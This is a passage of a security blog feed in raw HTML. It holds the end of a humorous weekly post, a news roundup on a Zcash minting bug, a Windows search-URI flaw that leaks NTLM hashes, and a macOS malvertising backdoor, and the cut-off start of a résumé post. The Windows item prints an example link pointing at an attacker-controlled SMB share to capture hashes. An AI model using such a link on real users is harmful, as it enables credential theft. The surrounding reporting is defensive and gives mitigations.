srcset="https://substackcdn.com/image/fetch/$s_!Y_Gc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbded5822-0139-4c7b-ba60-bcbf42d0df13_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!Y_Gc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbded5822-0139-4c7b-ba60-bcbf42d0df13_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!Y_Gc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbded5822-0139-4c7b-ba60-bcbf42d0df13_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!Y_Gc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbded5822-0139-4c7b-ba60-bcbf42d0df13_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Y_Gc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbded5822-0139-4c7b-ba60-bcbf42d0df13_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bded5822-0139-4c7b-ba60-bcbf42d0df13_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:465973,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200748916?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbded5822-0139-4c7b-ba60-bcbf42d0df13_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Y_Gc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbded5822-0139-4c7b-ba60-bcbf42d0df13_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!Y_Gc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbded5822-0139-4c7b-ba60-bcbf42d0df13_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!Y_Gc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbded5822-0139-4c7b-ba60-bcbf42d0df13_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!Y_Gc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbded5822-0139-4c7b-ba60-bcbf42d0df13_1168x784.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>&#8220;Zero-Days and Other Daily Disasters&#8221;</h3><p>Cisco dropping alerts on yet another SD-WAN zero-day (the 7th? We&#8217;ve lost count), random supply chain poisonings on GitHub, and the usual parade of phishing, credential leaks, and &#8220;oops I left the database exposed&#8221; moments.</p><p>It&#8217;s a full Looney Tunes orchestra of anvils falling from the sky. Every. Single. Day.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wYID!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f6f7eb4-c9c6-479a-bd91-08198394746f_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wYID!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f6f7eb4-c9c6-479a-bd91-08198394746f_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!wYID!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f6f7eb4-c9c6-479a-bd91-08198394746f_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!wYID!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f6f7eb4-c9c6-479a-bd91-08198394746f_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!wYID!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f6f7eb4-c9c6-479a-bd91-08198394746f_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wYID!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f6f7eb4-c9c6-479a-bd91-08198394746f_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6f6f7eb4-c9c6-479a-bd91-08198394746f_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:458250,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200748916?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f6f7eb4-c9c6-479a-bd91-08198394746f_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!wYID!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f6f7eb4-c9c6-479a-bd91-08198394746f_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!wYID!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f6f7eb4-c9c6-479a-bd91-08198394746f_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!wYID!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f6f7eb4-c9c6-479a-bd91-08198394746f_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!wYID!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f6f7eb4-c9c6-479a-bd91-08198394746f_1168x784.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div><hr></div><p><strong>Rod&#8217;s Public Service Cartoon Lesson of the Week:</strong><br>Lock your repos tighter than Scrooge McDuck&#8217;s vault. Use strong, unique passwords (or better yet, passkeys). Enable MFA everywhere&#8212;even your toaster. Patch like your job depends on it (it does). And for the love of all that is holy, stop using public GitHub as your personal sync folder.</p><p>If your organization got hit this week: Pour one out for the logs, update those CVEs, and maybe invest in some rubber chickens for stress relief.</p><p>That&#8217;s all for this Saturday, folks! Stay safe, stay silly, and remember: In cybersecurity, the only thing funnier than the hacks... is thinking they won&#8217;t happen to you. See you next week when the clowns inevitably return!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3c1n!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffb818f4-4ad4-4f6f-8abb-ccd9681419a8_1360x768.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3c1n!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffb818f4-4ad4-4f6f-8abb-ccd9681419a8_1360x768.jpeg 424w, https://substackcdn.com/image/fetch/$s_!3c1n!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffb818f4-4ad4-4f6f-8abb-ccd9681419a8_1360x768.jpeg 848w, https://substackcdn.com/image/fetch/$s_!3c1n!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffb818f4-4ad4-4f6f-8abb-ccd9681419a8_1360x768.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!3c1n!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffb818f4-4ad4-4f6f-8abb-ccd9681419a8_1360x768.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3c1n!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffb818f4-4ad4-4f6f-8abb-ccd9681419a8_1360x768.jpeg" width="1360" height="768" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ffb818f4-4ad4-4f6f-8abb-ccd9681419a8_1360x768.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:768,&quot;width&quot;:1360,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:436215,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200748916?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffb818f4-4ad4-4f6f-8abb-ccd9681419a8_1360x768.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!3c1n!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffb818f4-4ad4-4f6f-8abb-ccd9681419a8_1360x768.jpeg 424w, https://substackcdn.com/image/fetch/$s_!3c1n!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffb818f4-4ad4-4f6f-8abb-ccd9681419a8_1360x768.jpeg 848w, https://substackcdn.com/image/fetch/$s_!3c1n!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffb818f4-4ad4-4f6f-8abb-ccd9681419a8_1360x768.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!3c1n!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffb818f4-4ad4-4f6f-8abb-ccd9681419a8_1360x768.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><em>&#8212;Rod (your friendly neighborhood security cartoonist)</em><br><em>Disclaimer: No actual weasels or exploding rockets were harmed in the making of this post. Just egos and firewalls.</em></p><div><hr></div><p>What a week, eh? Drop your own security dad jokes in the comments. Stay frosty out there! &#128737;&#65039;&#129313;</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Security Check-in Quick Hits: Zcash Infinite Mint Bug, Windows NTLM Leak, and macOS Malvertising Surge]]></title><description><![CDATA[For June 5, 2026]]></description><link>https://rodtrent.substack.com/p/security-check-in-quick-hits-zcash</link><guid isPermaLink="false">https://rodtrent.substack.com/p/security-check-in-quick-hits-zcash</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Fri, 05 Jun 2026 18:01:22 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!0jBg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0jBg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0jBg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!0jBg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!0jBg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!0jBg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0jBg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:228577,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200746616?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!0jBg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!0jBg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!0jBg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!0jBg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe777cbea-2cae-4dbf-87a1-6a95a16abb93_1168x784.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>Zcash (ZEC) Plummets Nearly 50% After Critical Orchard Privacy Pool Vulnerability Exposed</h3><p>In one of the most dramatic crypto security stories of the day, Zcash experienced a massive price crash&#8212;dropping around 45-50%&#8212;following the disclosure of a critical vulnerability in its Orchard shielded privacy pool.</p><p><strong>What Happened?</strong><br>Security researcher Taylor Hornby discovered the bug using Anthropic&#8217;s Claude AI during an audit. The flaw, present since the Orchard launch in May 2022 (over 4 years), could have allowed attackers to mint an unlimited amount of counterfeit ZEC tokens within the privacy pool in a way that was potentially undetectable due to the shielded nature of transactions. A patch was deployed on June 1, followed by network upgrades (soft fork disabling Orchard transactions and a subsequent hard fork). No exploitation or supply inflation has been confirmed, but the privacy design makes definitive proof difficult, fueling widespread panic selling.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p><strong>Impact and Response:</strong><br>Whales were seen buying the dip despite the volatility, but the incident highlights ongoing risks in privacy-focused cryptocurrencies. The Zcash team and community emphasized the rapid response and integrity of the coin supply. This event serves as a stark reminder that even well-audited privacy tech can harbor long-dormant flaws, especially when AI-assisted audits uncover them.</p><p><strong>Key Takeaway for Users:</strong><br>Double-check wallet security, follow official upgrade announcements, and treat high-profile privacy coin incidents with caution. Infinite mint bugs are the nightmare scenario for any monetary protocol.</p><h3>Unpatched Windows Search URI Handler Flaw Enables Easy NTLMv2 Hash Theft</h3><p>A new unpatched vulnerability in Windows&#8217; built-in search URI handler allows attackers to steal Net-NTLMv2 hashes simply by tricking users into clicking a malicious link&#8212;no download or malware required.</p><p><strong>Details:</strong><br>Similar to the recently patched CVE-2026-33829 in the Snipping Tool, this issue exploits the search: handler (e.g., via search:query=test&amp;crumb=location:\\attacker-server\share). It triggers an SMB connection that leaks the victim&#8217;s NTLMv2 hash to an attacker-controlled server. These hashes can then be used in relay attacks for lateral movement across networks. The flaw has a &#8220;Moderate&#8221; rating but carries higher real-world risk due to its simplicity.</p><p><strong>Why It Matters:</strong><br>It affects everyday Windows users who click links in emails, browsers, or documents. No fix is available yet from Microsoft, making awareness critical. This joins other recent NTLM-related issues, underscoring persistent challenges with legacy authentication protocols.</p><p><strong>Mitigation Advice:</strong></p><ul><li><p>Be extremely cautious with unsolicited links.</p></li><li><p>Consider disabling NTLM where possible or using alternatives like Kerberos.</p></li><li><p>Monitor for anomalous SMB traffic and apply any future patches immediately.</p></li><li><p>Use network segmentation and endpoint detection to limit relay attack success.</p></li></ul><h3>Operation FlutterBridge: Malvertising Delivers New FlutterShell Backdoor to macOS Users</h3><p>Cybercriminals are aggressively using Google and YouTube ads to distribute <strong>FlutterShell</strong>, a sophisticated new macOS backdoor that bypasses Apple notarization via valid Developer IDs.</p><p><strong>Campaign Overview:</strong><br>Dubbed Operation FlutterBridge by Palo Alto Networks Unit 42, the malvertising effort targets global users (especially English-speaking and Western European markets) through hundreds of verified Google Ads. Victims are lured to fake sites that deliver the Flutter-based backdoor, which can hijack Chrome traffic, execute shell commands, modify files, and receive updates from attacker C2 servers.</p><p><strong>Implications:</strong><br>This represents an evolution in macOS threats, showing how ad platforms remain a high-value vector even for notarized malware. It affects users searching for legitimate software and highlights the risks of drive-by downloads from seemingly trusted ad sources.</p><p><strong>Defenses:</strong></p><ul><li><p>Verify app sources and avoid clicking ads for downloads.</p></li><li><p>Use ad blockers and keep macOS and browsers updated.</p></li><li><p>Employ reputable security tools with behavioral detection.</p></li><li><p>Stick to the Mac App Store when possible.</p></li></ul><p>These quick hits capture the fast-moving cybersecurity landscape today: from foundational protocol bugs in crypto to everyday OS flaws and advanced distribution methods. Stay vigilant, patch where possible, and verify before you click.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[I Built a Proper Résumé in a Couple Hours (And Finally Got Past the Bots)]]></title><description><![CDATA[Turns out my "stunning" two-column layout was a robot's worst nightmare]]></description><link>https://rodtrent.substack.com/p/i-built-a-proper-resume-in-a-couple</link><guid isPermaLink="false">https://rodtrent.substack.com/p/i-built-a-proper-resume-in-a-couple</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Fri, 05 Jun 2026 14:03:25 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!Mbet!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7370d0c5-503d-468a-8176-7e96fcd88cad_1248x832.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" 